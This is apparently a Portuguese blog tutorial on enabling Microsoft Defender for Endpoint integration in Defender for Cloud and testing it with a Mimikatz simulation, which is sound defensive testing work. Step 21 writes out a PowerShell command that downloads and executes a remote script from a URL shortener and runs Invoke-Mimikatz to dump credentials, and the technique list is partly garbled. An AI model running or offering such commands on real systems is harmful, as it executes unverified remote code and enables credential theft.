Microsoft Defender for Cloud – Endpoint Detection and Response (EDR)

O Microsoft Defender for Endpoint é uma solução holística, entregue à nuvem e de segurança de ponto final. Suas principais características são:

  • Risk-based vulnerability management and assessment
  • Attack surface reduction
  • Behavioral based and cloud-powered protection
  • Endpoint detection and response (EDR)
  • Automatic investigation and remediation
  • Managed hunting services

A integração do Defender for Cloud com o Microsoft Defender for Endpoint está ativada por padrão. Assim, quando você habilita recursos de segurança aprimorados, você dá consentimento para que o Microsoft Defender for servers acessem o Microsoft Defender for Endpoint dados relacionados a vulnerabilidades, software instalado e alertas para seus pontos finais.

Disponibilidade

AspectoDetalhes
Estado de liberação:Disponibilidade geral (GA)
Precificação:Requer o Microsoft Defender para servidores
Ambientes suportados: Computadores habilitados para Azure Arc executando Windows/Linux
VMs do Azure executando Linux (versões com suporte)
 VMs do Azure executando o Windows Server 2022, 2019, 2016, 2012 R2, 2008 R2 SP1, WVD (Área de Trabalho Virtual do Windows)Windows 10 Enterprise de várias sessões (anteriormente EVD (Enterprise para Áreas de Trabalho Virtuais)
 VMs do Azure executando o Windows 10 (diferente de EVD ou WVD)
Funções e permissões necessárias:* Para ativar/desativar a integração: Administrador de segurança ou Proprietário
* Para exibir os alertas do Defender for Endpoint no Defender for Cloud: Leitor de segurançaLeitorContribuinte do Grupo de RecursosProprietário de Grupo de RecursosAdministrador de SegurançaProprietário de Assinatura ou Colaborador de Assinatura
Nuvem: Nuvens comerciais
Azure Governamental
 Azure China 21Vianet
 Contas da AWS conectadas

Benefícios da integração do Microsoft Defender para endpoint com o Defender for Cloud

O Microsoft Defender for Endpoint protege suas máquinas Windows e Linux, sejam elas hospedadas no Azure, nuvens híbridas (no local) ou AWS. As proteções incluem:

  • Advanced post-breach detection sensors. Defender para os sensores da Endpoint coletar uma vasta gama de sinais comportamentais de suas máquinas.
  • Vulnerability assessment from the Microsoft threat and vulnerability management solution. Com o Microsoft Defender for Endpoint ativado, o Defender for Cloud pode mostrar vulnerabilidades descobertas pelo módulo de gerenciamento de ameaças e vulnerabilidades e também oferecer este módulo como uma solução de avaliação de vulnerabilidade suportada.

Este módulo também traz os recursos de inventário de software descritos no Access um inventário de software e pode ser ativado automaticamente para máquinas suportadas com as configurações de implantação automática.

  • Analytics-based, cloud-powered, post-breach detection. Defender for Endpoint rapidamente se adapta às ameaças em mudança. Ele usa análises avançadas e big data. É amplificado pelo poder do Intelligent Security Graph com sinais no Windows, Azure e Office para detectar ameaças desconhecidas. Ele fornece alertas acionáveis e permite que você responda rapidamente.
  • Threat intelligence. O Defender for Endpoint gera alertas quando identifica ferramentas, técnicas e procedimentos do atacante. Ele usa dados gerados por caçadores de ameaças da Microsoft e equipes de segurança, aumentados pela inteligência fornecida pelos parceiros.

Ao integrar o Defender for Endpoint com o Defender for Cloud, você se beneficiará dos seguintes recursos extras:

  • Automated onboarding. O Defender for Cloud habilita automaticamente o sensor Defender for Endpoint em todas as máquinas suportadas conectadas ao Defender for Cloud.
  • Single pane of glass. As páginas do portal Defender for Cloud exibem alertas do Defender para Endpoint. Para investigar mais, use o Microsoft Defender para as páginas do próprio portal do Endpoint, onde você verá informações adicionais, como a árvore do processo de alerta e o gráfico de incidentes. Você também pode ver uma linha do tempo detalhada da máquina que mostra cada comportamento por um período histórico de até seis meses.

Quais são os requisitos para o microsoft defender for Endpoint tenant?

Quando você usa o Defender for Cloud para monitorar suas máquinas, Defender for Endpoint tenant é criado automaticamente.

  • Location: Os dados coletados pelo Defender for Endpoint são armazenados na geolocalização do tenant conforme identificado durante o provisionamento. Os dados dos clientes em forma pseudônimo também podem ser armazenados nos sistemas centrais de armazenamento e processamento nos Estados Unidos. Depois de configurar a localização, você não pode alterá-la. Se você tiver sua própria licença para o Defender for Endpoint e precisar mover seus dados para outro local, entre em contato com o suporte da Microsoft para redefinir o tenant.
  • Moving subscriptions: Se você mudou sua assinatura do Azure entre os tenants do Azure, algumas etapas preparatórias manuais são necessárias antes que o Defender for Cloud implante o Defender for endpoint. Para obter detalhes completos, entre em contato com o suporte da Microsoft.

Passo a Passo

Habilitar o Microsoft Defender for Cloud

Para utilizar o Microsoft Defender for Endpoint é necessário que o Microsoft Defender for Cloud está configurado, já escrevi um artigo aqui no site mostrando como habilitar o Microsoft Defender for Cloud.

Como habilitar o Microsoft Defender for Cloud – Jádson Alves (jadsonalves.com.br)

01 – Faça login no portal do Azure.

02 – No portal do Azure pesquise por Microsoft Defender for Cloud.

03 – Na tela Microsoft Defender for Cloud | Overview em Management clique em Environment settings.

04 – Na tela Microsoft Defender for Cloud | Environment settings selecione a assinatura que deseja.

05 – Na tela Settings | Defender plans certifique-se que o plano Enable all Microsoft Defender for Cloud plans e Microsoft Defender for Servers estejam habilitados.

Habilite o Microsoft Defender for Endpoint integration

Habilitar a integração para Windows

Pré-requisitos

Confirme se sua máquina atende aos requisitos necessários para o Defender for endpoint:

  1. Certifique-se de que a máquina está conectada ao Azure e à internet conforme necessário:
  2. Enable Microsoft Defender for servers. Veja Quickstart: Habilite o Defender para os recursos de segurança aprimorados da Nuvem.

3. Se você mudou sua assinatura entre os tenants do Azure, algumas etapas preparatórias manuais também são necessárias. Para obter detalhes completos, entre em contato com o suporte da Microsoft.

06 – No portal do Azure pesquise Microsoft Defender for Cloud.

07 – Na tela Microsoft Defender for Cloud | Overview em Management clique em Environment settings.

08 – Na tela Microsoft Defender for Cloud | Environment settings selecione a assinatura que deseja.

09 – Na tela Settings | Defender plans clique em Integrations.

10 – Na tela Settings | Integrations certifique que a opção Allow Microsoft Defender for Endpoint to access my data está habilitada.

Observação: O Microsoft Defender for Cloud embarcará automaticamente suas máquinas no Microsoft Defender for endpoint. O onboarding pode levar até 12 horas. Para novas máquinas criadas após a ativação da integração, o onboarding leva até uma hora.
11 – As maquinas Windows da assinatura terão automaticamente a extensão MDE adicionadas, como podemos observar na imagem abaixo.

Habilitar a integração para Linux

12 –  No portal do Azure pesquise por Microsoft Defender for Cloud.
13 – Na tela Microsoft Defender for Cloud | Overview em Management clique em settings.
14 – Na tela Microsoft Defender for Cloud | Environment settings selecione a assinatura que deseja.
15 – Na tela Settings | Defender plans clique em Integrations.
16 – Na tela Settings | Integrations clique em Enable for Linux machines, em seguida clique em Save.
17 – Na tela Enable Linux machines in Microsoft Defender for Endpoint integration clique em Enable.
Observação: O Microsoft for Endpoint será provisionado para as máquinas Linux existentes e as novas máquinas criadas.
18 – Como podemos observar na imagem abaixo a integração com as máquinas Linux foi habilitada.
Observação: O Microsoft Defender for Cloud embarcará automaticamente suas máquinas no Microsoft Defender para endpoint. O onboarding pode levar até 12 horas. Para novas máquinas criadas após a ativação da integração, o onboarding leva até uma hora.

19 – Da próxima vez que você retornar a página do Microsoft Defender for Cloud em Settings Integrations, o botão Enable for Linux machines não será mostrado. Para desativar a integração para Linux, você precisará desabilitá-la para o Windows também, limpando a caixa de seleção para Allow Microsoft Defender for Endpoint to access my data.

20 – Como podemos observar a extensão MDE foi instalada nas máquinas virtuais Linux.

Simulando uma ameaça com Mimikatz

Mimikatz é um aplicativo de código aberto que permite aos usuários visualizar e salvar credenciais de autenticação, como tíquetes Kerberos . Benjamin Delpy continua liderando o desenvolvimento do Mimikatz, portanto, o kit de ferramentas funciona com a versão atual do Windows e inclui os ataques mais avançados.

Os invasores costumam usar o Mimikatz para roubar credenciais e elevar privilégios: na maioria dos casos, o software de proteção de endpoint e os sistemas antivírus detectam e removem. Por outro lado, os testadores de penetração usam Mimikatz para descobrir e testar vulnerabilidades em suas redes para que você possa corrigi-las.

Mimikatz demonstrou originalmente como explorar uma vulnerabilidade no sistema de autenticação do Windows. Agora, esta ferramenta cobre vários tipos diferentes de vulnerabilidades. Mimikatz pode realizar os seguintes métodos de coleta de credenciais:

  • Pass-the-Hash : Anteriormente, o Windows armazenava credenciais de autenticação em um hash NTLM . Os invasores usam o Mimikatz para passar a string hash exata para o computador de destino para login. Os invasores nem precisam quebrar a senha, eles só precisam interceptar o hash e usá-lo sem nenhum processamento. É o mesmo que encontrar a chave de todas as portas da casa no chão. Você precisa de uma chave para abrir qualquer porta.
  • Pass-the-Ticket ( ): Windows , (Ticket). Mimikatz Kerberos . , .
  • Over-Pass the Hash (Pass the Key): pass-the-hash, , .
  • Kerberos Golden Ticket): (pass-the-ticket), KRBTGT. .« » .
  • Kerberos Silver Ticket: pass-the-ticket, « » Windows, . Kerberos (TGS), . Microsoft (TGS) , .
  • Pass-the-Cache): , Windows! , Mac/UNIX/Linux.

21 – No Windows Server abra o Command Prompt e execute o seguinte comando.

powershell “IEX (new-Object Net.Webclient).DownloadString(‘http://is.gd/oeoFuI’); Invoke-Mimikatz -DumpCreds”

Após executar o comando o Windows Security vai detectar como uma ameaça e fará o bloqueio.

22 – Abra o Windows Security clique em Virtus & threat protection em Current threats, clique em Threat history, na tela Threat history clique em See full history, percebam que temos o Trojan:PowerShell/Mimikats.

23 – No portal do Azure pesquise por Microsoft Defender for Cloud, na tela Microsoft Defender for Cloud | Overview clique em Security alerts.

24 – Na tela Microsoft Defender for Cloud | Security alerts temos todos os alertas de segurança do ambiente, percebam que temos os alertas Mimikatz credential theft tool e Suspicious use of PowerShell detected  com gravidade alta para a máquina virtual “VM-Teste-EDR-Win”.

25 – Na tela do Microsoft Defender for Cloud clique em Inventory.

26 – Na tela Microsoft Defender for Cloud | Inventory selecione a máquina virtual “vm-teste-edr-win.
27 -Na tela Resource health (Preview) no canto esquerdo percebam que temos as informações relacionadas a máquina virtual como instalação do Monitoring agent, total de recomendações de segurança, alertas ativos e informações do recurso. No canto direito temos as opções Recommendations, Alerts e Installed applications, clique em Alerts.
28 – Em Alerts percebam que temos os dois alertas de segurança Mimikats credential theft toll e Suspicious use of PowerShell detected, clique em Mimikats credential theft toll.
29 – Após selecionar o alerta no canto esquerdo observe que temos algumas informações importantes como gravidade, status, descrição do alerta e recurso afetado.
30 – No canto direito temos alert details e Take action, em Alert details temos informações importantes como categoria de ameaça, a ação que o antivírus tomou que nesse caso foi remove, usuário que executou o vírus e o nome do arquivo, temos também um link para verificar o alerta no Microsoft Defender for Endpoint.

31 – Abaixo temos Related entities onde podemos observar as informações, Account, File, File hash, Host e Malware.

32 – Ainda na tela do alerta Mimikatz credential theft tool clique em Take action.

33 – Em Take action temos as opções Mitigate the threat onde temos algumas etapas sugeridas pelo Microsoft Defender for Cloud para mitigar a ameaça, também temos a opção Prevent furure attacks com recomendações para prevenir ataques futuros. Com a opção Trigger automated responde podemos configurar uma resposta automática utilizando o logic app, e também podemos suprimir os alertas semelhantes como a opção Supress similiar alerts.

34 – Também podemos descartar o alerta, que basicamente esconde o alerta do painel de alertas de segurança, em Active e selecionando Dismissed.

Comente suas sugestões e observações! 

Forte abraço, obrigado e até o próximo post.

Deixe um comentário

O seu endereço de e-mail não será publicado.